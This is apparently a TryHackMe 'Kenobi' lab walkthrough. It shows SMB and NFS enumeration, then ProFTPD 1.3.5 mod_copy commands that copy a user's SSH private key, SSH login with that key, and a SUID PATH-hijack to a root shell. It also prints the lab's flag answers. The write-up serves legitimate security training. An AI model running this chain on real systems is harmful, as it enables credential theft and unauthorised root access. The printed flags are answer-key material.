Kenobi: TryHackMe Walkthrough Writeup.
Task 1: Deploy the vulnerable machine
#1. Scan the machine with nmap, how many ports are open?
nmap -vvv 10.10.241.243
Answer: 7
Task 2: Enumerating Samba for shares
Using nmap we can enumerate a machine for SMB shares.
Nmap has the ability to run to automate a wide variety of networking tasks. There is a script to enumerate shares!
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.241.243
Using the enum4linux tool
Alternatively, we can utilize the enum4linux tool to discover the shares operating on the machine. Given that the target machine uses the Samba service, this tool allows us to identify both the number and types of active shares. To achieve this, execute the following command:
We obtain the output as follows:
#1. Using the nmap command above, how many shares have been found?
Answer: 3
On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.
smbclient //10.10.241.243/anonymous
Using your machine, connect to the machines network share.
For password just press “Enter”.
#2. Once you’re connected, list the files on the share. What is the file can you see?
Answer: log.txt
You can recursively download the SMB share too. Submit the username and password as nothing.
smbget -R smb://10.10.241.243/anonymous
Open the file on the share. There is a few interesting things found.
To open the file without downloading run:
more log.txt- Information generated for Kenobi when generating an SSH key for the user
- Information about the ProFTPD server.
#3. What port is FTP running on?
Asnwer: 21
Earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.
In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.241.243
#4. What mount can we see?
Answer: /var
Task 3: Gain initial access with ProFtpd
Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.
#1. What is the version?
Answer: 1.3.5
We can use searchsploit to find exploits for a particular software version.
Searchsploit is basically just a command line search tool for exploit-db.com.
#2. How many exploits are there for the ProFTPd running?
Answer: 4
Between performing the task and writing the blog alongside my attackbox time limit reached and so i had to use my own kali machine for the remaining tasks.
The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.
We’re now going to copy Kenobi’s private key using SITE CPFR and SITE CPTO commands.
So just netcat to the machine:
nc 10.10.241.243 21Then copy the id_rsa file to /var/tmp directory
┌──(kali㉿kali)-[~]
└─$ nc 10.10.241.243 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.241.243]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Lets mount the /var/tmp directory to our machine
mkdir /mnt/kenobiNFS
mount 10.10.241.243:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi’s account.
┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
└─$ sudo chmod 600 id_rsa
└─$ ssh -i id_rsa kenobi@10.10.241.243Boom! And we get the access:
#3. What is Kenobi’s user flag (/home/kenobi/user.txt)?
Answer: d0b0f3f53b6caa532a83915e19224899
Task 4: Privilege Escalation with Path Variable Manipulation
SUID bits can be dangerous, some binaries such as passwd needs to be run with elevated privileges (as its resetting your password on the system), however other custom files that have the SUID bit can lead to all sorts of issues. To search a system for these type of files run the following:
find / -perm -u=s -type f 2>/dev/nullRunning the command gives us the following output:
#1. What file looks particularly out of the ordinary?
Answer: /usr/bin/menu
#2. Run the binary, how many options appear?
Answer: 3
Strings is a command on Linux that looks for human readable strings on a binary.
This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).
As this file runs as the root users privileges, we can manipulate our path gain a root shell.
We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!
#3. What is the root flag (/root/root.txt)?
Answer: 177b3cd8562289f37382721c28381f02
The End. Thank you!
